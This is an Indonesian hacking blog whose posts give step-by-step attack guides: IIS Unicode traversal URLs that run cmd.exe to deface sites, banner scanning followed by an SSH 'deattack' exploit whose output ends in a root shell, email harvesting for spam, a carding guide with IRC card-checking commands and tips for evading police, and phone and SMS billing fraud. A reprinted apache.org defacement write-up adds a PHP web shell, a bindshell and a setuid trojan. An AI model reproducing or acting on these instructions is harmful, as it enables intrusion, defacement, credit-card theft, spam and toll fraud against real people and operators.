Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah
mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,
index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.
Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau
D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set
URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...
Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih
lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah.....
truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html
Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah...
contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html
Lihat apa yg terjadi di IE kitaa
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied
Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat
targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site
tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee
(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk
langkah selanjutnyah*)
Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..
Kedua lewat TFTP32.
*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori
C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe
. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL
berikut :
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.ex
Diposkan oleh Dj BxxA di 01:59 0 komentar Link ke posting ini
Label: yang iseng-iseng
Cara Mendapatkan Puluhan Ribu Email
A. Gunakan software Mailcrawl (notworksolution.com) Versi gratisnya bisa menyimpan 3.000 email sekali pencarian, bisa diakali sampai bisa menyimpan 15.000 email/keyword.
Cara menggunakan :
1. Pada quick start wizard click using target searching kemudian masukkan keyword khas Indonesia
(keluarga, uang, wanita, sukses, pertanian, militer)
2. Option :
a. thread pilih 60-80
b. email parsing: klik only extract email with these extension/domain lalu isi .com .net .id c. pada ignore email with these username isi dengan daftar kata di bawah : (copy saja)
abuse info consult notice privacy support spam nospam sales bugtraq listserv subscribe unsubscribe
majordomo reply bounce mail nama domain daemon www news xxx 20 3d file main webadmin webmaster
admin owner promaster postmaster hostmaster manajerhosting tuanweb webhosting daftar register billing
customercare customerservice cs feedback komentar manager namaanda name username yourname
support technical service cs prohosting zzz info support technical request join berhenti
anggota menu index help file artikel d. automatic saving pilih angka 1.000 e. Start --- beri nama folder tempat penyimpanan hasil sesuai dengan nama keyword f. Jika angka email valid belum mencapai 1,000 sedangkan panel pencarian telah mendekati batas akhir,
lakukan stop kemudian tambahkan keyword baru tanpa harus mereset lagi. Sebaiknya nama folder
penyimpanan gabungan keyword
g. Jika angka email valid telah mendekati angka 3.000 sementara panel pencarian masih jauh dari batas
akhir. Lakukan stop lalu start kemudian beri nama baru folder hasil pencarian, sebaiknya keyword1,
keyword2 dst.
3. Jika telah dilakukan pengumpulan dengan banyak keyword, pasti ada email ganda.
Untuk mendapatkan daftar email tunggal gunakan software Listawy (mewsoft.com). Sofware ini selain bisa
merge, removal email juga mensplit seluruh email menurut jumlah file atau jumlah email/per file
Diposkan oleh Dj BxxA di 01:58 0 komentar Link ke posting ini
Label: yang iseng-iseng
Root Attack
lebih lanjut...
1. download scanning http://xvak-1.150m.com/tool/grabbb-0.1.0.tar.gz
2. tar -zxvf grabbb-0.1.0.tar.gz dan make , maka akan kmu dapati file grabbb.
3. cara penggunaan grabbb :
a. ketik ./grabbb maka akan ada help nya
b. klo saya biasanya ./grabbb -a xxx.xxx.xxx.0 -b xxx.xxx.xxx.255 port <== port disini
terserah kmu mau berapa, bisa 21, 22, 23, 443, 80, 8080
- klo kita scan port 21 maka akan keliatan versi wuftpd
- klo kita scan port 22 maka akan keliatan versi ssh
- klo kita scan port 443 maka akan keliatan versi openssl
berikut contoh ssh:
66.1.198.210:22: SSH-1.99-OpenSSH_2.5.2p2
66.1.205.138:22: SSH-1.99-OpenSSH_2.9p2
66.1.213.59:22: SSH-1.5-1.2.27
66.1.214.123:22: SSH-1.99-OpenSSH_2.9p2
66.1.217.77:22: SSH-1.5-1.2.25
setelah kita tau ssh yang dipake, tinggal menjalankan exploitnya
4. download x2, x3, x4 dst tergantung kmu mau pake yang mana, pake semua juga bisa
sebagai contoh pemakaian saya pake x3.tar.gz
5. ./x3 -t 0
SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)
Targets:
( 1) Small - SSH-1.5-1.2.26
( 2) Small - SSH-1.5-OpenSSH-1.2.3
( 3) Small - SSH-1.5-1.2.31
( 4) Small - SSH-1.5-1.3.07
( 5) Small - SSH-1.99-OpenSSH_2.1.1
( 6) Small - SSH-1.5-1.3.6_F-SECURE_SSH
( 7) Small - SSH-1.5-1.2.27
( 8) Small - SSH-1.99-OpenSSH_2.2.0p1
( 9) Big - SSH-1.99-OpenSSH_2.2.0p1
(10) Big - SSH-1.5-1.2.27
(11) Small - SSH-1.99-OpenSSH_2.2.0p1 -TEST
(12) Big - SSH-1.5-1.2.27
6. klo kita liat hasil dari grabbb, maka kita mendapat satu ip yaitu
66.1.213.59:22: SSH-1.5-1.2.27
7. kita coba ./x3 -t 7 66.1.213.59 22 .
SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)
Target: Small - SSH-1.99-OpenSSH_2.2.0p1
Attacking: 66.1.213.59:22
Testing if remote sshd is vulnerable # ATTACH NOW
YES #
Finding h - buf distance (estimate)
(1 ) testing 0x00000004 # SEGV #
(2 ) testing 0x0000c804 # FOUND #
Found buffer, determining exact diff
Finding h - buf distance using the teso method
(3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV #
(4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED
(5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED #
(6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SURVIVED #
(7 ) binary-search: h: 0x083faffc, slider: 0x00000800 # SEGV #
(8 ) binary-search: h: 0x083fabfc, slider: 0x00000400 # SURVIVED #
(9 ) binary-search: h: 0x083fadfc, slider: 0x00000200 # SEGV #
(10) binary-search: h: 0x083facfc, slider: 0x00000100 # SEGV #
(11) binary-search: h: 0x083fac7c, slider: 0x00000080 # SURVIVED #
(12) binary-search: h: 0x083facbc, slider: 0x00000040 # SURVIVED #
(13) binary-search: h: 0x083facdc, slider: 0x00000020 # SURVIVED #
Bin search done, testing result
Finding exact h - buf distance
(16) trying: 0x083facdc # SURVIVED #
Exact match found at: 0x00005324
Looking for exact buffer address
Finding exact buffer address
(17) Trying: 0x080c5324 # SEGV #
(18) Trying: 0x080c6324 # SEGV #
(19) Trying: 0x080c7324 # SEGV #
(20) Trying: 0x080c8324 # SEGV #
(21) Trying: 0x0810e324 # SURVIVED #
(22 Trying: 0x08088634 # OK #
Finding distance till stack buffer
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
********* YOU ARE IN *********
uname -a ; id
uname -a ; id
Linux chander.com.tw 2.4.18-3 #1 Thu Apr 18 07:31:07 EDT 2002 i586 unknown
uid=48(root) gid=48(root) groups=48(root)
nah itu uah dapat, terserah mau diapakan
keterangan:
ngeroot menggunakan exploit ini sangatlah memakan waktu, saya menyarankan utk memakai scan massal, bisa memakai massplo.tar.gz atau massrooter.tar.gz sama saja.
tapi yang terpenting disini kita tau bagaimana cara mencari dia memakai ssh versi berapa, wuftp versi berapa, dan yang lain-lain
Diposkan oleh Dj BxxA di 01:55 0 komentar Link ke posting ini
Label: yang iseng-iseng
Senjata Seorang Carder
Tentu kalian udah nggak asing lagi dengan istilah yang satu ini,carder adalah istilah yang diberikan oleh hacker sejati untuk pencuri kartu kredit. Kali ini kita akan bahas soal carder ini.
Tapi ingat!!! yang aku tulis ini,hanya bersifat ilmu pengetahuan.aku tidak bertanggung jawab jika kalian berurusan dengan pihak kepolisian. Aku sarankan jika kalian mendapat cc jangan beli barang.
Mari kita mulai......
1.masuk ke MIRC
dari MIRC kalian join ke channel ini :
#CCPOSTS
#THACC (Dulu namanya #thecc)
sebenarnya masih banyak channel yang lainnya tapi aku kasih dua aja yaa!!
2.setelah join ke #ccpost kamu ketik perintah !commands dan kemudian akan muncul di layar perintah perintah yang bisa kamu gunakan.
3.!chk cc number valid /!chk 1234567890 1202 untuk mengetahui kartu tsb bisa di gunakan atau tidak.
4.!cvv2 cc number/ !cvv2 1234567890 untuk mengetahui nomor identitas kartu tsb (card ID)
5.!proxy
untuk mengetahui nomor proxy dan port yang bisa kamu gunakan untuk mengelabui ISP.
6.!order.log
untuk mengetahui nama,alamat dan cc number seseorang.
ini nih cuplikannya :
#ccposts
*** Now talking in #ccposts
*** Topic is '..:: Welcome To #CCPOSTS | !Chk [OFF] !Commands [ON] !Cvv2 [ON] | Also Idle In #Dont.whois.me.bitch and get Aop | +o/+v Verify First| /server xdirc.d2g.com -> Free BNC: /server portatech.net 21500 xdirc'
*** Set by ^XDIrc^ on Thu May 09 02:04:28
-CCard-Chk-Bot- Tired Of Using Dallnet FFoor Checking CC's ? Try X-Niatites 5.01 -- http://mi5.ausgamers.com/xns501.exe (Win ME untested & 24 Valid CC's Included) !cvv2 5437000105070603 !commands
*** Quits: MIHUTESCU (~mihut@80.97.26.67) (Client closed connection) Er0sake` , < 5437000105070603 > is Master > cvv2 : -> 074 <-, by : SL[a]TkiS , #DaCc
-listen2rap- SL[a]TkiS's command llist iiss as following: !country Country-Name, !state State-Name, !bank cc-Number, !bnc, !order.log, !cardable, !proxy, !unicode, !cvv2 ccNumber - -=. SL[a]TkiS addon version 4.0, get it at www.sthost4u.net/Programs/slatkis_addon_4.0.zip , #DaCc =- <@^Enhance^> ?? Request ?? Info?Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs & Ripperz Piss Off? ? ?? ?
*** Joins: ^tyty^ (BaCk0ff@max227.idx.com.au)
*** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: )
* DaLinuX i have root i need cc msg me for trade
!chk 373216942923005 0802
#thacc
*** Now talking in #thacc
*** Topic is 'We are not responsible for any actions that non-op's perform or any actions against DALnet policy that may done at the main chan}}[Type: !commands ] ||GSD's site: www.TheCC.biz || [ Join #CCpower ] [new command by GSD > !phone < only when MR^all' is here] y2y = GSD'
*** Set by GSD on Fri May 03 02:11:11
!proxy
*** Parts: fc4 (~umik_o@203.147.50.12)
*** Joins: fc4 (~umik_o@203.147.50.12)
<^Enhance^> ?? Request ?? Info?Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs & Ripperz Piss Off? ? ?? ?
*** Quits: ALICE22 (kozxgy@189.Red-80-34-233.pooles.rima-tde.net) (Quit: IRcap 7.1 http://www.ircap.net !)
*** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: ) !xlogin 373216942923005 0802
*** e_KiNGHT-[Away] is now known as Guest53360
How I can see my card is valid
* DaLinuX i have root i need cc msg me for trade
Jelas ??!
Sekedar saran aja, pakai alamat rumah kontrakan/kost, jadi setelah barang yang didapat sampai, segera kabur dari rumah tersebut, hheeeehe, biar gak dilacak
Diposkan oleh Dj BxxA di 01:51 0 komentar Link ke posting ini
Label: yang iseng-iseng
Tip n Trik Telepon Gratis
I. Trik telphon gratis Lokal (dalam kota)
Fasilitas dan cara yang digunakan:
1. Telphone umum koin yang masih hidup
2. Pencet angka 1551 <--- catatan: angka 1 terakhir di pencet lama hingga ada nada "tut/nit/nada sela lainnya"
3. Bila tanda itu telah bunyi baru tekan nomor yang dituju ( nomor telphone lokal)
4. dan anda akan mendapatkan sambungan langsung dari telkom ke no telp yang dituju, maka anda bisa bicara sepuas bibir anda.
Note: Untuk nomor lokal yang tidak bisa dihubungi biasanya dikarenakan :
1. TERLALU BANYAK NOMOR YANG KEMBAR
2. TERLALU BANYAK ANGKA DOMINAN BESAR MISAL 8997896/89868789/ dll
3. DAN BILA TELEPHONE YANG DITUJU BELUM TERPASANG
4. TELKOM SEDANG KENA TROUBLE :))
II. TRIK TELEPHONE GRATIS INTERLOKAL (LUAR KOTA)
Fasilitas dan cara yang digunakan:
1. Telphone rumah, kantor atau wartel tipe B (sangat dianjurkan)
2. Telponlah seperti kita menelpon biasa ke NOMOR TUJUAN LUAR KOTA (khusus luar kota)
3. Bicaralah sepuas hati dan sebengkak bibir anda
4. Bila telah selesai percakapan ... PERHATIKAN TRIK INI:
TRIK 1. - SEBELUM ANDA MENUTUP TELEPHON, KETIKLAH NOMOR TUJUAN PERSIS SEPERTI NOMOR YANG DITUJU PERTAMA
misal: tujuan 021888555000 -> bila telah selesai ketikan 021888555000 lagi
JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL
TRIK 2. - SEPERTI CARA TRIK PERTAMA TADI CUMAN KITA RUBAH NOMOR TUJUAN AKHIR
misal: tujuan 021888555000 -> bila telah selesai ketikan 031545552222 (BEDA NOMOR TUJUAN)
JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL
CATATAN: Hati-hati dalam melakukan aksi ini karena sangat merugikan pihak lain. Jangan sekali-kali gunakan wartel tipe A untuk melakukan trik II telepon gratis keluar kotak karena akan kelihatan pada komputer billing operator dan pasti Anda akan dicurigai karena pulsa akan hilang begitu saja dari layar monitor operator Wartel. Jangan menggunakan trik ini kanare akan merugikan "pihak lain" =))
Diposkan oleh Dj BxxA di 01:51 0 komentar Link ke posting ini
Label: yang iseng-iseng
LINUX
Unix yang seluruh source codenya dibuat dengan bahasa C sangat memudahkan
pengembanganya sehingga dalam waktu singkat Unix dapat berkembang secara
pesat, dan terbentuklah dua aliran : yaitu Unix yang dikembangkan oleh
Universitas Berkeley dan yang dikembangkan AT&T.
Semakin lama semakin banyak perusahaan yang ikut melibatkan diri, sehingga
terjadilah persaingan antar perusahaan untuk memegang kontrol terhadap
sistem operasi.PErsaingan ini menyebabkan perlunya sebuah standar yang baku
sehingga lahirlah proyek bernama 'POSIX' yang di motori oleh IEEE (The
Institute of Electrical and Electronics Engineers) yang akan menetapkan
spesifikasi standar Unix. ternyata, dengan adanya standar tersebut tetap
belum bisa meredakan persaingan yang timbul yang mengakibatkan munculnya
berbagai varian dari Unix.
Source code Minix yang tercipta sebagai salah satu varian Unix dan dibuat
oleh Andy S Tanembaum untuk tujuan pendidikan inilah yang dijadikan Linus
Torvalds sebagai referensi untuk membuat suatu Opeating system yang dapat
bekerja seperti Unix dalam komputer 386. Dalam pembuatan linux , Linus
memakai tool-tool dari Free Software Foundation yang berlicensi GNU. Agar
sistem operasi yang baru dibuatnya utuh , linus juga menambahkan program-
program yang berlicensi GNU. Linux yang dibuat linus sebagai hobi akhirnya
membuahkan versi pertama linux, yaitu linux versi 0.0.1, setelah mengalami
perbaikan pada versi 0.02 dan merupakan linux resmi pertama yang diumumkan
secara luas kepada publik. pada tanggal 5 Oktober 1991 linus menggumumkan
source codenya.
Linux yang pertama dirilis sudahdapat menjalankan shell bash,GNU C compiler
, GNU make, GNU Sed, Compress dll. Proyek linux ini menyita begitu banyak
perhatian seluruh programer di dunia yang akhirnya berpartisipasi untuk
ikut mengembangkan linux.
'Linux' bisa jadi merupakan proyek para hacker yang sangat berharga di
dalam sejarah - serta didistribusikan secara bebas beserta kode sumbernya
keseluruh dunia.
Diposkan oleh Dj BxxA di 01:49 0 komentar Link ke posting ini
Label: yang iseng-iseng
BUG SMS Satelindo
Teknologi SMS sekarang ini memang makin marak terlebih lagi dengan keadaan ekonomi yang Berantakan, solusi smslah yang lebih tepat dibanding menelpon yang sangat merobek kantong.
GSM yang menggunakan teknik switching dengan memanfaatkan system base station memungkinkan kita bisa mengirim pesan alphanumeric singkat dari sebuah Handphone ke handphone lain.
oke sampe disini preambule kita akhiri.
Kenapa dengan sms gratis yang dulu pernah populer sekarang telah susah ditemui?, itu pertanyaan yang sangat lazim terlontar dari pikiran kita semua yang mengandalkan sebuah promosi produk yang akhirnya menjadi komersil.
Bug yang saya dapatkan pada akhir bulan ini yaitu sebuah sms gratis dengan memanfaatkan kelemahan pada SATELINDO GSM. kenapa satelindo? nomor yang di keluarkan pihat SATELINDO yang baru dengan nomor seri depan 163***(misal +6281616378**) mempunyai bug yang dapat bermanfaat bagi kita untuk ber SMS gratis dengan sipengguna. Telah dicoba dari Simpati, mentari, proXL, dll tetap bisa dilakukan secara gratis.
cara sebagai berikut:
1. ketik SMS
2. kirim kenomor yang dituju ( misal: +6281616378** - tanpa bintang)
(yang saya dapatkan yaitu buug mentari versi 6163 <- diambil dari kode kartu dan nomor awal dari kartu mentari tersebut)
3. cara tulis nomor yang dituju menjadi 616378** (coba dgn nomor lain bila perlu)
4. tidak menggunakan karakter apapun yang ditambah pada nomor tujuan (karakter bintang hanya untuk menutupi nomor asli yang dituju.
4. dapat kita liat bahwa sms kita terkirim.
5. finish
Dari sana kita bisa lakukan dengan sepuas hati.
Diposkan oleh Dj BxxA di 01:48 0 komentar Link ke posting ini
Label: yang iseng-iseng
How To Deface APACHE
/*
* Before you start reading
*/
This paper does _not_ uncover any new vulnerabilities. It points out common
(and slightly less common) configuration errors, which even the people at
apache.org made. This is a general warning. Learn from it. Fix your systems,
so we won't have to :)
/*
* introduction
*/
This paper describes how, over the course of a week, we succeeded in
getting root access to the machine running www.apache.org, and changed
the main page to show a 'Powered by Microsoft BackOffice' logo instead
of the default 'Powered by Apache' logo (the feather). No other changes
were made, except to prevent other (possibly malicious) people getting in.
Note that the problems described in this paper are not apache-related,
these were all config errors (one of 'm straight from BugZilla's README,
but the README had enough warnings so I don't blame the BugZilla developers).
People running apache httpd do not need to start worrying because of
anything uncovered herein.
We hacked www.apache.org because there are a lot of servers running apache
software and if www.apache.org got compromised, somebody could backdoor
the apache server source and end up having lots of owned boxes.
We just couldn't allow this to happen, we secured the main ftproot==wwwroot
thing. While having owned root we just couldnt stand the urge to put that
small logo on it.
/*
* ftproot == wwwroot
* o+w dirs
*/
While searching for the laters apache httpserver to diff it the with
previous version and read that diff file for any options of new buffer
overflows, we got ourselves to ftp://ftp.apache.org. We found a mapping of
the http://www.apache.org on that ftp including world writable directories.
So we wrote a little wuh.php3 including
passthru($cmd);
?>
and uploaded that to one of the world writable directories.
/*
* Our commands executed
*/
Unsurprisingly, 'id' got executed when called like
http://www.apache.org/thatdir/wuh.php3?cmd=id
Next was to upload some bindshell and compile it like calling
http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c and then
executing it like calling http://www.apache.org/thatdir/wuh.php3?cmd=./httpd
/*
* The shell
*/
Ofcourse we used a bindshell that first requires ppl to authenticate with
a hardcoded password (:
Now we telnet to port 65533 where we binded that shell and we have local
nobody access, because cgi is running as user nobody.
/*
* The apache.org box
*/
What did we find on apache.org box:
-o=rx /root
-o=rx homedirs
apache.org is a freebsd 3.4 box. We didn't wanted to use any buffer
overflow or some lame exploit, goal was to reach root with only
configuration faults.
/*
* Mysql
*/
After a long search we found out that mysql was
running as user root and was reachable locally. Because apache.org was
running bugzilla which requires a mysql account and has it
username/password plaintext in the bugzilla source it was easy to
get a username/passwd for the mysql database.
We downloaded nportredird and have it set up to accept connections on
port 23306 from our ips and redir them to localhost port 3306 so we could
use our own mysql clients.
/*
* Full mysql access
* use it to create files
*/
Having gained access to port 3306 coming from localhost, using the login
'bugs' (which had full access [as in "all Y's"]), our privs where
elevated substantially. This was mostly due to sloppy reading of the BugZilla
README which _does_ show a quick way to set things up (with all Y's) but
also has lots of security warnings, including "don't run mysqld as root".
Using 'SELECT ... INTO OUTFILE;' we were now able to create files
anywhere, as root. These files were mode 666, and we could not overwrite
anything. Still, this seemed useful.
But what do you do with this ability? No use writing .rhosts files - no
sane rshd will accept a world-writable .rhosts file. Besides, rshd
wasn't running on this box.
/*
* our /root/.tcshrc
*/
Therefore, we decided to perform a trojan-like trick. We used database
'test' and created a one-column table with a 80char textfield. A couple
of inserts and one select later, we had ourselves a /root/.tcshrc with
contents similar to:
#!/bin/sh
cp /bin/sh /tmp/.rootsh
chmod 4755 /tmp/.rootsh
rm -f /root/.tcshrc
/*
* ROOT!!
*/
Quite trivial. Now the wait was for somebody to su -. Luckily, with 9
people legally having root, this didn't take long. The rest is trivial
too - being root the deface was quickly done, but not until after a
short report listing the vulnerabilities and quick fixes was build.
Shortly after the deface, we sent this report to one of the admins.
/*
* Fix that ftproot==wwwroot
*/
Another thing we did before the deface, was creating a file 'ftproot' in
the wwwroot (which was also ftproot), moving 'dist' to 'ftproot/dist'
and changing the ftproot to this new 'ftproot' dir, yielding the
world-writable dirs unexploitable but allowing ftp URLs to continue
working.
/*
* What could have been compromised?
*/
Remember the trojaned tcp_wrappers on ftp.win.tue.nl last year? If we
wanted to, we could have done the same thing to Apache. Edit the source
and have people download trojaned versions. Scary, eh?
/*
* In short:
*/
- ftproot==webroot, worldwritable dirs allowing us to upload and execute
php3 scripts
- mysqld running as root, with a FFULL RIGHTS login without a password.
/*
* Compliments for the Apache admin team
*/
We would like to compliment the Apache admin team on their swift
response when they found out about the deface, and also on their
approach, even calling us 'white hats' (we were at the most 'grey hats'
here, if you ask us).
No comments:
Post a Comment